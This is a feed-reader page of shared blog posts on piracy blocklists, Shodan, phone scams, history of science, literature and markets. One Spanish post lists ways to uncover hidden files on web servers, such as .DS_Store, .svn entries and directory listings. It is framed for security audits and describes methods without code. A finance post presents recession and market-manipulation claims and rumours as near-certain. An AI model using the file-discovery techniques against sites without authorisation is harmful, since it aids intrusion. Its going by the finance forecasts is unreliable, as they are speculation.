Shared posts

18 Apr 07:20

Shoplifting notice – improved

by Jasper
17 Apr 09:10

Pirate Bay Proxy Now Included in Secret ISP Blocklist

by Andy

censorshipAlthough they complain extremely loudly about piracy in the United States, the major record labels have never tried to have a domain blocked there.

Instead they’ve focused on countries around Europe and have achieved many of their site blocking successes through the UK High Court.

The blocks against The Pirate Bay, KickassTorrents, H33T and Fenopy (and before them Newzbin2) are controversial and widely circumvented, but perhaps of most concern is the way they are being implemented.

While the various and extremely detailed High Court rulings are available for public consumption, the actual list of domains being supplied by the record labels to the ISPs is not. This lack of transparency has done nothing to convince critics that there’s nothing to hide but through a series of coincidences, TorrentFreak discovered that perhaps there is.

Early last week The Pirate Bay switched to a new Greenland domain and within hours strange things began to happen. Many Pirate Bay proxy sites ceased to function and displayed ISP blocking pages instead, causing a flurry of emails from readers concerned that proxies were also becoming censorship targets.

Suspicious that the domain switch and the proxy problems were connected, TorrentFreak spoke with the operators of PirateReverse, one of the proxies that had ceased to function. In short, a technical issue with the way the new TPB domain was configured caused the proxies to pass information to the ISPs that they would not normally receive. This led to the proxies being blocked.

However, before we received this information we spoke to UK ISP Virgin Media to see if they were blocking the TPB proxies. We sent a list of URLs representing the apparently blocked sites and after a few days a spokesperson responded.

“We are only blocking those sites we are required to block by the court order,” we were told. “As a responsible ISP, Virgin Media supports the clear, legal framework put in place to protect against copyright infringement and we continue to comply with court orders specifically addressed to the company.”

However, it seems that at least one site not operated by The Pirate Bay is present on the High Court order and is currently being blocked.

“To clarify, http://tpb.voxanon.org/ is blocked as per the court order,” Virgin Media told TorrentFreak.

TorrentFreak asked Virgin if they were able to supply us with a full copy of the list of URLs they are being asked to block. We were told that they could not.

So, we moved onto the BPI, the organization supplying the URLs to the High Court and ISPs on behalf of the labels. We wrote to Director of Communications Adam Liversage and explained what we had discovered and again asked for a copy of the list. We received no response.

It is not in dispute that the High Court has found that The Pirate Bay, KickassTorrents, H33T and Fenopy contravene the Copyright Act and therefore should be blocked. Whether people like that or not, that’s a fact.

The big issue here is why the blocking list is being kept out of the public eye. The Voxanon site is indeed a Pirate Bay proxy, but there is no mention of that site in the High Court order and no ruling that it operates illegally. In addition to the concern that mores sites will eventual creep onto this list it raises the specter of more blocklists being created in future, again with no public accountability.

If there’s to be any confidence that these High Court orders are in the public interest, then there’s nothing to hide. And, let’s face it, if all the list contains is a rundown of domains owned by these sites it’s not going to make exciting reading. So why not publish the list?

Source: Pirate Bay Proxy Now Included in Secret ISP Blocklist

17 Apr 14:53

Shodan, el buscador más terrorífico de Internet

by LUK
“Cuando la gente no encuentra algo en Google, se cree que nadie lo puede encontrar. Eso es falso”.

La apreciación corresponde a John Matherly, creador de Shodan, el buscador más terrorífico de Internet.
A diferencia de Google, que se concentra en la búsqueda de sitios web, Shodan es una especie de buscador “oscuro” que detecta servidores, cámaras web, impresoras, routers y todo aquello que se conecta y forma Internet.



Shodan opera permanentemente y obtiene información de unos 500 millones de dispositivos y servicios conectados cada mes. Y los resultados de las búsquedas son sorprendentes: desde semáforos hasta cámaras de seguridad, pasando por sistemas de calefacción y crematorios.

Los usuarios de Shodan también han encontrado sistemas de control para un parque acuático y una estación de servicio. Y los investigadores en seguridad informática han localizado sistemas de comando y de control de plantas nucleares y un acelerador de partículas utilizando Shodan.

Pero lo que llama la atención de Shodan, y lo que lo hace tan escalofriante, es que muy pocos de estos dispositivos tienen restricciones de seguridad para acceder a ellos.

“Puedes acceder a prácticamente la mitad de Internet con una contraseña predeterminada”, indicó HD Moore, jefe de seguridad de Rapid 7, que opera un servicio similar a Shodan para clientes. “Es una falla masiva de seguridad”, agregó. De esta forma, son incontables las impresoras, servidores y dispositivos que tienen “admin” o “1234” como contraseña. Y, de hecho, la mayoría de los sistemas conectados no solicitan ninguna credencial para controlarlos.

En una charla durante la conferencia de seguridad informática de Defcon, el experto Dan Tentler demostró cómo utilizaba Shodan para encontrar sistemas de control para aires acondicionados, calentadores de agua y puertas de garaje.

Encontró una pista de hockey que podía descongelarse con apenas un botón. El sistema de tránsito de una ciudad estaba conectado a Internet y podía manipularse ingresando un simple código. Y también halló un sistema de control para una planta hidroeléctrica en Francia con dos turbinas que generan tres megavatios cada una.
El problema, claro, radicaría en que todo esto caiga en las manos equivocadas.

“Los daños podrían ser muy serios”, dijo Tentler.

La buena noticia es que la finalidad de Shodan es otra.
Matherly, que completó Shodan hace tres años como parte de un proyecto personal, ha limitado las búsquedas a solo diez resultados para los usuarios no registrados y cincuenta para los inscriptos. Y si quieres ver todo lo que Shodan tiene para ofrecer, Matherly solicita el pago de una suscripción y más información acerca de tu objetivo.

Los principales usuarios de Shodan son expertos en seguridad, investigadores académicos y agencias gubernamentales. Los “malos” pueden utilizarlo como punto de partido, admite Matherly, pero los “cibercriminales” suelen tener acceso a botnets (grupos de computadoras infectadas) que logran el mismo propósito sin ser detectadas.
Hasta la fecha, la mayoría de los ataques informáticos se ha concentrado en robar dinero y propiedad intelectual, no en provocar daños explotando un edificio o desconectando los semáforos de una ciudad.

Por lo pronto, los profesionales de seguridad esperan evitar este escenario detectando estos dispositivos y servicios inseguros con Shodan y alertando de su vulnerabilidad a quienes los operen.

¿Confías en la buena voluntad de Shodan? Cuéntanos !

via CNN
18 Apr 04:39

El timo de los números 118xx y Google

by Yago Jesus
Es innegable nuestra dependencia hoy día de Google, mucha gente ni siquiera se molesta en teclear la URL de servicios conocidos, simplemente pone 'facebook' en la barra de búsqueda y espera a que Google les de el enlace.
Google, aun siendo el buscador mas usado (o igual por eso), es víctima de muchos 'pillos' que se afanan por encontrar huecos para colar su timo.
Hoy vamos a hablar de los números de teléfono 118xx, en principio son solo números de información, de esos que proliferaron cuando se terminó el afable y gratuito 1003 'de toda la vida' y que tienen un coste por llamada bastante alto.
Como el resto de números de sobre-tarificación viven de dar una supuesta información 'muy útil' cobrándola a precio de oro.
Hasta aquí, nada que objetar, si alguien es tan generoso de usar ese número para encontrar información que se puede encontrar en un buscador, genial.
El problema viene cuando engañas a la gente, cuando timas y cuando intentas lucrarte a base de aprovecharte de incautos.
Ayer necesitaba localizar el número de atención al cliente de cierto operador, vago de mí puse en google:
'telefónica atención al cliente'
y ¡¡ Sorpresa !! esto fue lo que me encontré

Como se puede observar (click para agrandar la imagen) nos encontramos con que unos cuantos 'listos' han comprado ADS en google para que muestre como primer resultado sus números de sobre-tarificación. ¡ Toma ya !
En este caso nos encontramos 11847. Bueno, aquí, haciendo un ejercicio de sofismo en estado puro, uno puede pensar, tal vez 'telefónica' es un término muy genérico y en buena lid, 'telefónica atención al cliente' igual se puede interpretar como 'atención telefónica' en genérico, venga vale
¿Y si buscamos otro? Veamos

Ah no ! ahora si que no hay la menor duda, ya en plan descarado, buscando el número de atención al cliente de Yoigo nos encontramos en primer lugar 11834 y más abajo, como tercer resultado 11874.
Ya no me cabe ninguna duda: Timo a la vista, de hecho, si visitamos uno de esos enlaces, nos encontramos algo como:

Creo que sobran las palabras, personalmente entiendo que esto está hecho así para generar confusión y hacer que la gente llame y sea víctima de un timo. De hecho si se googlean esos números nos encontramos con cosas como esta:

Si yo fuese telefónica, Yoigo, ONO o cualquier operadora, ya estaría tomando cartas en el asunto.
18 Apr 05:30

Técnicas para descubrir los ficheros de un sitio web 1 de 2

by noreply@blogger.com (Maligno)
Una de las cosas que es necesario realizar cuando se hace una auditoría es qué archivos hay en el servidor web, ya que en cualquiera de ellos puede estar la llave con que abrir la lata. Para ello existe una gran variedad de maneras de intentar encontrar todas las carpetas y ficheros que en el servidor web están "ocultos" a simple vista. Encontrarlos es un juego divertido similar a buscar las piezas de un puzzle que permitan ver la foto completa que se esconde tras el nombre de dominio original, y son diversas.

Muchas de estas técnicas están implementadas en FOCA, otras no, y como quiero que se implementen, este fin de semana pasado le dedique un tiempo a recopilarlas todas en una lista que me ha quedado un poco larga, por lo que os la voy a publicar en un par de posts. Estas son todas ellas:

1.- Crawling

La primera y más evidente es leer los códigos fuentes de las páginas web de un sitio y seguir todos los enlaces que de ellas se pueden extraer. Esto es algo que tradicionalmente hacemos con Burp Suite ya que podemos conectar la búsqueda de URLs con las pruebas de FOCA. El módulo de spidering es suficientemente bueno cómo para sacar un fichero con todas las rutas a archivos de un sitio.

Figura 1: Spidering con Burp

2.- Robots.txt

Estos archivos guardan rutas a documentos y carpetas, así que por si el crawling no hubiera encontrado todos, merece la pena darles una lectura a ver qué aparece por allí. Algunas veces pueden aparecer rutas sorprendentes como vimos con el robots.txt de RTVE o curiosas como el famoso robots.txt de la Casa Real.

3.- Sitemap.xml

Los archivos sitemap.xml también recogen ficheros y contenidos de un sito. Generalmente son URLs públicas con información para mejorar la indexación que de un sitio hacen los buscadores. Conviene sacar estas URLs y alimentar con ellas el motor de crawling, por si el sistema se hubiera parado antes de localizar una de esas direcciones.

Figura 2: El sitemap.xml de Casa Real a día de hoy

4.- Buscadores

Los buscadores pueden indexar URLs que hayan llegado a su base de datos por medio de un enlace directo que se haya puesto en alguna otra página - recordad el caso de los XSS-Google Persistentes - o porque alguna barra del navegador o el mismo Google Chrome, hayan reportado esa URL como el caso de Blogger y la predicción del futuro o el sofá del Bank of América. Hay que revisar los archivos indexados por los buscadores. Además, un fallo de configuración antiguo de un sitio puede haber sido utilizado para indexar los archivos, y están en la base de datos del buscador. Por supuesto, encontrar objetivos rápidos se puede hacer con el truco de la barra en Google.

5.- Directory Listing

Por supuesto, hay que revisar todas las carpetas de todas las URLs para encontrar aquellas que puedan tener un directory listing abierto. Esta es la mejor de las opciones, pues permite ver todo lo que hay en una carpeta sin necesidad de buscar más.

6.- Ficheros .listing

Los ficheros .listing, que son creados por el wget son un ls -la de la carpeta donde se ha subido o de donde se han descargado determinados ficheros. Aunque no tienen porque ser lo que haya en ese directorio, si que salen muchas URLs que deben ser probadas.

Figura 3: Aspecto de un fichero .listing

7.- Ficheros .DS_Store

Los ficheros .DS_Store generados por el infame Finder de Mac OS X han demostrado ser una fuente jugosa de información para obtener archivos y carpetas de un directorio, tal y como vimos esta semana con el programa DS_Store.

8.- Ficheros Thumbs.db

Los ficheros Thumbs.db también guardan nombres de archivos - y miniaturas - de los thumbnails asociados a los archivos en Windows XP o Windows 2003. Para analizar los ficheros thumbs.db podéis utilizar el servicio online que está disponible hace mucho tiempo en Informática64 llamado Thumbando.

Figura 4: Salida de Thumbando cuando se le pasa un Thums.db

9.- Repositorios de código fuente de los sitios web

En ellos suelen quedar ficheros que registran los archivos subidos y/o actualizados en cada post de un desarrollador. Sistemas como subversion o BuildBot pueden ser auténticas fuentes de información para conocer qué hay en un sitio web escondido, donde el amigo .SVN/Entries y su base de datos wc.db junto con el directorio pristine son un autentico regalo en una auditoria. 

10.- Ficheros de error 404

Los mensajes de error también pueden tirar rutas internas o del sitio web. De ellos merece la pena recordar los mensajes de error 404 en aplicaciones ASP migradas a IIS 7, o los mensajes de error 404 en documentos TCL de WebDNA.

Figura 5: Rutas en un mensaje de error 404 de IIS con ASP

Hasta aquí los 10 primeros sitios a mirar, en la segunda parte tienes otra buena tanda de sitios y formas para encontrar las URLs que nos lleven a los nombres de los ficheros, para así poder encontrar los que sean juicy files.

Saludos Malignos!
18 Apr 06:09

Confesiones de un autor pirateado

by Marcos Taracido

Artículos: Marcos Taracido

Hay, según opino, en este texto de Daniel Cassany, contradicciones y medias verdades, pero también bastante sentido común y varias cosas de las que se puede aprender: Confesiones de un autor pirateado.

«Por supuesto, avisé a mis editoriales, que escribieron al administrador norteamericano del repositorio y a los pocos días se habían eliminado dichas copias. Pero meses después se habían subido otras. O sea, esto es como las verrugas, que las quemas pero salen de nuevo. Algunas de mis editoriales han contratado los servicios de una empresa —”carísima”, dicen—, para limpiar la red, pero no parece que sea muy efectivo.
Resignado, he empezado a coleccionar “versiones piratas” de mis textos. Tengo una carpeta para cada libro. Las hay de todo tipo: completas y parciales, escaneadas de un original o tecleadas con procesador, con varios sellos de origen, en varios formatos (PDF, Word, foto). No salgo de mi asombro. Le pongo sarcasmo porque no quiero hacer sangre ni me interesa la paranoia.»

18 Apr 06:09

Cómo explotaron los ordenadores

by Marcos Taracido

Artículos: Marcos Taracido

Jim Holt reseña un ensayo que cuenta el origen de los ordenadores, y lo hace de tal modo que sirve tanto como resumen perfecto para no leerse el libro o como acicate para lanzarse a comprarlo: Cómo explotaron los ordenadores.

«No fue sólo el ímpetu militar tras el proyecto lo que despertó la oposición en el instituto. Muchos pensaban que un monstruo semejante, capaz de realizar tal número de cálculos, fuera cual fuera su propósito, no tenía lugar en lo que estaba concebido como una especie de paraíso platónico para la erudición y el conocimiento en estado puro. El Institute for Advance Study fue fundado en 1930 por los hermanos Abraham y Simon Flexner, filántropos y reformadores educativos. El dinero procedía de Louis Bamberger y su hermana, Caroline Bamberger Fuld, que vendió su participación en la cadena de grandes almacenes Bamberger a Macy’s en 1929, pocas semanas antes del colapso bursátil.»

17 Apr 13:08

Notes on the History of Lines: Sight Lines

by John F. Ptak

JF Ptak Science Books   Quick Post    History of Lines 

These are particularly fine and relatively early printed images depicting a specific kind of line of sight--this one, a positioning, rather than a line of sight in fire control, or radial velocity, EM radiation or acoustics wave propagation, or targeting...this instrument was used to establish an imaginary line in perceived objects. 

Sextant 237This is a detail from Andrew Wakley's  The mariner's compass rectified : containing tables, shewing the true hour of the day, the sun being upon any point of the compass ; with the true time of the rising and setting of the sun and stars, and the points of the compass upon which they rise and set ... With the description and use of those instruments most in use in the art of navigation. Also a table of the latitudes and longitudes of places, published in 1763 and reprinted many times after that. (Full text is available from Google books and also from the Haithi Trust which offers a text version of the book as well.)

The full page from which the detail is drawn:

Sextant 236

There is a certain continuum in developing sight lines that comes to mind, as with this famous image drawn by Leonardo in 1508, perhaps the first modern interpretation of how the eye functions, kept privately in manuscript, the result of theory and experimentation:

Leonardo eye

 Which leads us to the sigh lines of Albrecht Durer, illustrating (some 17 years later) the use of a perspective tool, the vielo, in his work The Drawing Manual published in 1525:

http://www.oneonta.edu/faculty/farberas/arth/Images/ARTH_214images/Durer/durer_perspnude_large.jpg

 

The quadrant is a tool used to determine position and time--a tool divided into four segments (hence the "quad" part, the fourth part of a circle, as the sextant was a sixth part, dividing one section into 60o).

And just for the record, here's Ptolemy's eyes, looking through his sextant, which he (probably) developed to replace the astrolabe:

Quadrant ptolemy2
  Quadrant ptolemy
This fine image of a fore-staff (back-staff) is also found in the book, a navigational and positional tool that was replaced by the sextant:

17 Apr 22:11

History Tells Us That A Gold Crash + An Oil Crash = Guaranteed Recession

by Michael

History Tells Us That A Gold Crash + An Oil Crash = Guaranteed RecessionIs the United States about to experience another major economic downturn?  Unfortunately, the pattern that is emerging right now is exactly the kind of pattern that you would expect to see just before a major stock market crash and a deep recession.  History tells us that when the price of gold crashes, a recession almost always follows.  History also tells us that when the price of oil crashes, a recession almost always follows.  When both of those things happen, a significant economic downturn is virtually guaranteed.  Just remember what happened back in 2008.  Gold and oil both started falling rapidly in July, and in the fall we experienced the worst financial crisis that the U.S. had seen since the days of the Great Depression.  Well, a similar pattern seems to be happening again.  The price of gold has already crashed, and the price of a barrel of WTI crude oil has dropped to $86.37 as I write this.  If the price of oil dips below $80 a barrel and stays there, that will be a major red flag.  Meanwhile, we have just seen volatility return to the financial markets in a big way.  When volatility starts to spike, that is usually a clear sign that stocks are about to go down substantially.  So buckle your seatbelts - it looks like things are about to get very, very interesting.

Posted below is a chart that shows what has happened to the price of gold since the late 1960s.  As you will notice, whenever the price of gold rises dramatically and then crashes, a recession usually follows.  It happened in 1980, it happened in 2008, and it is happening again...

The Price Of Gold

A similar pattern emerges when we look at the price of oil.  During each of the last three recessions we have seen a rapid rise in the price of oil followed by a rapid decline in the price of oil...

The Price Of Oil

That is why what is starting to happen to the price of oil is so alarming.  On Wednesday, Reuters ran a story with the following headline: "Crude Routed Anew on Relentless Demand Worries".  The price of oil has not "crashed" yet, but it is definitely starting to slip.

As you can see from the chart above, the price of oil has tested the $80 level a couple of times in the past few years.  If we get below that resistance and stay there, that will be a clear sign that trouble is ahead.

However, there is always the possibility that the recent "crash" in the price of gold might be a false signal because there is a tremendous amount of evidence emerging that it was an orchestrated event.  An absolutely outstanding article by Chris Martenson explained how the big banks had been setting up this "crash" for months...

In February, Credit Suisse 'predicted' that the gold market had peaked, SocGen said the end of the gold era was upon us, and recently Goldman Sachs told everyone to short the metal.

While that's somewhat interesting, you should first know that the largest bullion banks had amassed huge short positions in precious metals by January.

The CFTC rather coyly refers to the bullion banks simply as 'large traders,' but everyone knows that these are the bullion banks.  What we are seeing in that chart is that out of a range of commodities, the precious metals were the most heavily shorted, by far.

So the timeline here is easy to follow.  The bullion banks:

  1. Amass a huge short position early in the game
  2. Begin telling everyone to go short (wink, wink) to get things moving along in the right direction by sowing doubt in the minds of the longs
  3. Begin testing the late night markets for depth by initiating mini raids (that also serve to let experienced traders know that there's an elephant or two in the room)
  4. Wait for the right moment and then open the floodgates to dump such an overwhelming amount of paper gold and silver into the market that lower prices are the only possible result
  5. Close their positions for massive gains and then act as if they had made a really prescient market call
  6. Await their big bonus checks and wash, rinse, repeat at a later date

While I am almost 100% certain that any decent investigation by the CFTC would reveal that market manipulating 'dumping' was happening, I am equally certain that no such investigation will occur.  That's because the point of such a maneuver by the bullion banks is designed to transfer as much wealth from 'out there' and towards the center, and the CFTC is there to protect the center's 'right' to do exactly that.

You can read the rest of that article right here.

There are also rumors that George Soros was involved in driving down the price of gold.  The following is an excerpt from a recent article by "The Reformed Broker" Joshua Brown...

And over the last week or so, the one rumor I keep hearing from different hedge fund people is that George Soros is currently massively short gold and that he's making an absolute killing.

Once again, I have no way of knowing if this is true or false.

But enough people are saying it that I thought it worthwhile to at least mention.

And to me, it would make perfect sense:

1. Soros is a macro investor, this is THE macro trade of the year so far (okay, maybe Japan 1, short gold 2)

2. Soros is well-known for numerous market aphorisms and neologisms, one of my faves being "When I see a bubble, I invest."  He was heavily long gold for a time and had done well while simultaneously referring to it publicly as a speculative bubble.

3. He recently reported that he had pretty much exited the trade in gold back in February. In his Q4 filing a few weeks ago, we found out that he had sold down his GLD position by about 55% as of the end of 2012 and had just 600,000 shares remaining. That was the "smartest guy in the room" locking in a profit after a 12 year bull market.

4. Soros also hired away one of the most talented technical analysts out there, John Roque, upon the collapse of Roque's previous employer, broker-dealer WJB Capital. No one has heard from the formerly media-available Roque since but we can only assume that - as a technician - the very obvious breakdown of gold's long-term trend was at least discussed. And how else does one trade gold if not by using technicals (supply/demand) - what else is there? Cash flow? Book value?

5. Lastly, the last public interview given by George Soros was to the South China Morning Post on April 4th. He does not mention any trading he's doing in gold but he does reveal his thoughts on it having been "destroyed as a safe haven"

It is also important to keep in mind that this "crash" in the price of "paper gold" had absolutely nothing to do with the demand for physical gold and silver in the real world.  In fact, precious metals retailers have been reporting that they have been selling an "astounding volume" of gold and silver this week.

But that isn't keeping many in the mainstream media from "dancing on the grave" of gold and silver.

For example, New York Times journalist Paul Krugman seems absolutely ecstatic that gold has crashed.  He seems to think that this "crash" is vindication for everything that he has been saying the past couple of years.

In an article entitled "EVERYONE Should Be Thrilled By The Gold Crash", Business Insider declared that all of us should be really glad that gold has crashed because according to them it is a sign that the economy is getting better and that faith in the financial system has been restored.

Dan Fitzpatrick, the president of StockMarketMentor.com, recently told CNBC that people are "flying out of gold" and "getting into equities"...

"There have been so many reasons, and there remain so many reasons to be in gold," Fitzpatrick said, noting currency debasement and the fear of inflation. "But the chart is telling you that none of that is happening. Because of that, you're going to see people just flying out of gold. There's just no reason to be in it.Traders are scaling out of gold and getting into equities."

Personally, I feel so sorry for those that are putting their money in the stock market right now.  They are getting in just in time for the crash.

As CNBC recently noted, a very ominous "head and shoulders pattern" for the S&P 500 is emerging right now...

A scary head-and-shoulders pattern could be building in the S&P 500, and this negative chart formation would be created if the market stalls just above current levels.

"It's developing and it's developing fast," said Scott Redler of T3Live.com on Wednesday morning.

Even worse, volatility has returned to Wall Street in a huge way.  This is usually a sign that a significant downturn is on the way...

Call options buying recently hit a three-year high for the CBOE's Volatility Index, a popular measure of market fear that usually moves in the opposite direction of the Standard & Poor's 500 stock index.

A call buy, which gives the owner the option to purchase the security at a certain price, implies a belief that the VIX is likely to go higher, which usually is an ominous sign for stocks.

"We saw a huge spike in call buying on the VIX, the most in a while," said Ryan Detrick, senior analyst at Schaeffer's Investment Research. "That's not what you want to hear (because it usually happens) right before a big pullback."

The last time call options activity hit this level, on Jan. 13, 2010, it preceded a 9 percent stock market drop that happened over just four weeks, triggered in large part by worries over the ongoing European debt crisis.

And according to Richard Russell, the "smart money" has already been very busy dumping consumer stocks...

What do billionaires Warren Buffet, John Paulson, and George Soros know that you and I don't know? I don't have the answer, but I do know what these billionaires are doing. They, all three, are selling consumer-oriented stocks. Buffett has been a cheerleader for US stocks all along.

But in the latest filing, Buffett has been drastically cutting back on his exposure to consumer stocks. Berkshire sold roughly 19 million shares of Johnson and Johnson. Berkshire has reduced his overall stake in consumer product stocks by 21%, including Kraft and Procter and Gamble. He has also cleared out his entire position in Intel. He has sold 10,000 shares of GM and 597,000 shares of IBM.

Fellow billionaire John Paulson dumped 14 million shares of JP Morgan and dumped his entire position in Family Dollar and consumer goods maker Sara Lee. To wrap up the trio of billionaires, George Soros sold nearly all his bank stocks including JP Morgan, Citigroup and Goldman Sachs. So I don't know exactly what the billionaires are thinking, but I do see what they're doing -- they are avoiding consumer stocks and building up cash.

... the billionaires are thinking that consumption is heading down and that America's consumers are close to going on strike.

So what are all of those billionaires preparing for?

What do they know that we don't know?

I don't know about you, but when I start putting all of the pieces that I have just discussed together, it paints a rather ominous picture for the months ahead.

At some point, there will be another major stock market crash.  When it happens, we will likely see even worse chaos than we saw back in 2008.  Major financial institutions will fail, the credit markets will freeze up, economic activity will grind to a standstill and millions of Americans will lose their jobs.

I sincerely hope that we still have at least a few more months before that happens.  But right now things are moving very rapidly and it is becoming increasingly clear that time is running out.

Time Is Running Out

18 Apr 08:23

¿ Manipulación de la información de los medios a las masas?...



¿ Manipulación de la información de los medios a las masas? ¿De que manipulación me estas hablando?

17 Apr 04:20

Mundo Hacker en Discovery Max

by noreply@blogger.com (Maligno)
Como sabéis se está emitiendo Mundo Hacker en Discovery Max. Yo participé unos minutos en el Capítulo 3, dedicado a la Ciberguerra, y como se ha publicado ya en Internet, lo tenéis aquí para poder verlo.


Si queréis saber más de este tema, yo he recopilado algunos incidentes de ciberguerra y ciberespionaje en un artículo. Además, puedes ver los demás capítulos de Mundo Hacker de Discovery Max en Flu-Project y la madrugada del jueves al viernes de esta semana podrás ver el siguiente.

Saludos Malignos!
16 Apr 16:38

Por qué he dejado de colaborar en TEDxCibeles

by Sara D'Eustacchio
Reblogueado desde álvaroSarasúa:[youtube=http://www.youtube.com/watch?v=2r1W8HtB-ic&w=600&h=368] "Let's stop being so damn respectful" Richard Dawkins en TED Hace un par de meses comencé a colaborar como blogger en TEDxCibeles. Para los que no conozcáis TED, es una organización sin ánimo de lucro que crea espacios de encuentro para compartir "ideas que merecen ser difundidas" (Ideas Worth Spreading). Los TEDx […]
17 Apr 18:01

Large Scale Botnet Brute Force Password Cracking Against WordPress Sites

by Darknet
There have always been a lot of brute force attempts/bot scans and hacking attempts on WordPress hosted sites (due to flaws in the core and a multitude of insecure plugins) – this site being no exception (they’ve even done some minor damage before). But things appear to have really ramped up recently with a large [...] The post Large...

Read the full post at darknet.org.uk
17 Apr 06:31

Rediseño orientado a la prevención de errores

by torresburriel

Una de las premisas fundamentales en las que baso mi trabajo cuando alguien me pide que le aconseje acerca de qué acciones llevar a cabo para mejorar la experiencia de usuario de un producto digital es observar los posibles errores que se pueden producir en la utilización del mismo. No es ningún secreto maravilloso, pues ya los tradicionales heurísticos de Nielsen hablan de la prevención de errores como elemento fundamental de la usabilidad de los sitios web.

He de decir que con el tiempo uno adquiere ciertas costumbres a la hora de observar, y sea cual sea la realidad que está observando siempre se terminan identificando elementos susceptibles de ser modificados para que la prevención de errores esté presente en el diseño de las cosas. Insisto, sea cual sea la naturaleza de éstas.

Un buen modelo lo constituye el ejemplo visual que os traigo en esta ocasión. Me lo descubrieron en Sevilla, en uno de esos bares para guiris que hay en el centro de la capital de Andalucía (donde por cierto, nos tomamos 5 cañas y 5 tapas de boquerón y nos cobraron 5 euros).

Rediseño máquina de tabaco
Máquina de tabaco rediseñada para evitar pequeños hurtos

La historia de este rediseño (muy de rollo lean) de la máquina de tabaco es la siguiente. Tradicionalmente en los bares lo que se suele hacer cuando uno entra y lleva puesto el abrigo o la cazadora, es quitársela y dejarla en donde puede. Si en el bar no hay perchas, como es el caso, o no hay suficientes, un buen sitio para dejar el abrigo es la parte superior de la máquina de tabaco.

¿Qué riesgo supone esta práctica? Pues que en momentos de acumulación de personal en el bar, y la consiguiente abundancia de abrigos depositados encima de la máquina de tabaco, es posible que los amigos de los ajeno hagan su trabajo y se roben alguno.

¿Qué supone esta realidad? Además del enfado y disgusto de las personas a quienes les hayan podido robar el abrigo, los responsables del bar, en un punto determinado, advierten a los clientes de que no dejen los abrigos encima de la máquina de tabaco para evitar la posibilidad de que en un despiste, les sea sustraído. Esa es ya una acción encaminada a la prevención de errores, pero no es escalable. Los responsables del bar tienen que estar todos los días, a todas las horas en las que hay clientes, haciendo esa advertencia.

¿Solución? La que se observa en la fotografía. Se modifica el diseño de la máquina de tabaco de tal manera que no sea físicamente posible dejar encima ningún objeto. Y si no hay objetos, los amigos de lo ajeno (que los hay en todas partes) no tienen nada que hacer.

Sencillo y eficaz.

17 Apr 09:02

Mi escritor favorito, ese gilipollas

by Ricardo J. G.

esc

Cuando publiqué mi primer libro hubo amigos que me preguntaron quién lo había escrito de verdad. Descartaban que pudiera ser el mismo tipo con el que recordaban haber abandonado algún bar en peor estado que George Clooney tras su juerga con Tarantino en Abierto hasta el amanecer. La decepción de los cercanos me confirmó que Reinaldo Arenas tenía razón: a los escritores es mejor leerlos desde la distancia, pero no conocerlos personalmente “porque se pueden sufrir terribles desengaños”.

La cita del autor cubano es anterior a Internet, cuando aún se mantenían ciertas distancias y los lectores se conformaban con una firma en la Feria del Libro. Estos días quieren una amistad en Facebook, compartir fotos de las vacaciones y consejos para su aniversario de boda. Socializar un poco, vamos. Debe de haber poetas que no salen de casa por temor a decepcionar a los fans, que esperan ser saludados con un soneto.

Kapuscinsky sostenía que para ser buen periodista hay que ser buena persona, pero nada indica que sea una condición indispensable para producir buena literatura de ficción. Incluso antes de este despelote social del escritor, nos enteramos de que Tolstoi maltrataba a su mujer mientras terminaba Ana Karenina. Los lectores de García Márquez han visto como a lo largo de los años el Nobel colombiano prefería la compañía de Fidel Castro al compromiso de defender la libertad de los cubanos. Vargas Llosa tiene su lista de ridículos, incluido aquel surrealista intento de llegar a presidente del Perú. ¿Y quién iba a decir, leyéndole, que Günter Grass escondía un pasado nazi?

La culpa de tanto desengaño no es de los autores, sino de los lectores que se empeñan en identificarlos con el más virtuoso de sus personajes, olvidando que solo una personalidad compleja puede producir la mejor literatura. Ya saben, alejada de las simplezas de un mundo dividido en buenos y malos. Seguramente Tolstoi pudo escribir Guerra y Paz porque ambos mundos convivían en su interior. ¿Conocerle en bata y zapatillas, botella de vodka en mano, en una dacha rusa? Probablemente habría llevado a uno de esos “terribles desengaños” de los que hablaba Arenas.

Uno sabe lo que es descubrir que uno de sus autores de cabecera no es lo que le gustaría. Hace ya algunos años que Ángel Fernández Fermoselle, el editor de Kailas, me introdujo en la excepcional obra de Mo Yan, el último premio Nobel de Literatura. El autor chino es un señor afable y tímido, simpático incluso. Ah, y miembro del Partido Comunista Chino (PCCh) que manda a miles de personas a campos de reeducación, ejecuta a más presos que el resto del mundo junto y censura a cientos de compañeros de oficio de Mo, cuando no los encierra en celdas de aislamiento.

La víspera de su discurso en la Academia sueca preguntaron al premiado chino por la supresión de la libertad de prensa en su país y vino a decir que eran cosas que pasaban en todos lados. ¿Es posible que un escritor capaz de escribir obras maestras como La Balada del Ajo no vea la diferencia entre China y España, donde uno puede poner a parir a su presidente (aprovecho: Rajoy me parece medio lelo) sin pasar 20 años en un gulag? Yo creo que no es posible, así que solo puedo concluir que Mo guarda silencio sobre los abusos del régimen chino por afinidad ideológica, interés o cobardía, no porque lo tenga todo dicho en sus libros como alega. Cuando le escucho me tienta la idea de quemar sus libros en la hoguera, pero luego recapacito y me digo que tomarse la literatura de forma tan personal solo tiene un pase en la adolescencia. Prefiero la distancia que me permite seguir leyendo a mi autor favorito, ese gilipollas.

17 Apr 16:20

Ya tengo las chapas para Félix @lajamoneria #Retromañía



Ya tengo las chapas para Félix @lajamoneria #Retromañía

15 Apr 15:02

Decimals, Holes & Dots in the History of Mathematics

by John F. Ptak

JF Ptak Science Books   Post 2011

There is an interesting side note to this blog's series on the histories of holes and dots--a mathematical aspect involving decimal points, decimal notation and placeholders.  This is exclusive of the number zero, however, which is an entirely different topic. 

 

Reisch b

The book that this  beautifully-illustrated counting board (below) is found is in Gregor Reisch's  (1467-1525) Margarita Philosophica (1503)  and depicts (amidst much else in the greatly humanist volume) representations of the mathematicians Boethius and Pythagoras working math problems on the given tools of their day. The tools on the right seem to be circles, but they're not--they're counting stones, and for our intents and purposes here, they shall be dots, and in the history of dots in math and business reckoning they have had a strong and long life. 

Reisch

